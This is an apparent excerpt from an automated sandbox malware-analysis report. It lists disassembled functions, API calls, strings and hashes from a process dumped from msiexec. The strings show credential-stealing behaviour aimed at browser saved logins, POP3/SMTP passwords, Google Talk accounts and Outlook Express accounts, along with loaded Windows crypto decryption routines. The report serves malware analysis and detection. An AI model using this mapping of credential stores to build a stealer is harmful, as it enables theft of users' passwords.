                                                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 379 410ddf-410de2 370->379 380 410dee-410df1 370->380 373 410e27-410e35 371->373 374 410e1d-410e20 371->374 375 410e45-410e4f call 410a9c 373->375 374->373 377 410e22-410e25 374->377 384 410e51-410e76 call 410d3d call 410add 375->384 385 410e7f-410e92 _mbscpy 375->385 377->373 381 410e37-410e40 377->381 379->371 383 410de4-410de7 379->383 387 410df8 380->387 381->375 383->371 386 410de9-410dec 383->386 384->385 389 410e95-410e97 385->389 386->371 386->380 387->389
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 119022999-2036018995
                                                                                                                                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                                                Strings
                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                • API String ID: 3996936265-1079885057
                                                                                                                                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 458 40cf3f-40cf43 452->458 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_strcmpimemset
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 520177685-3817206916
                                                                                                                                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 145871493-0
                                                                                                                                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4165544737-0
                                                                                                                                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFind
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                • API String ID: 2238633743-192783356
                                                                                                                                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
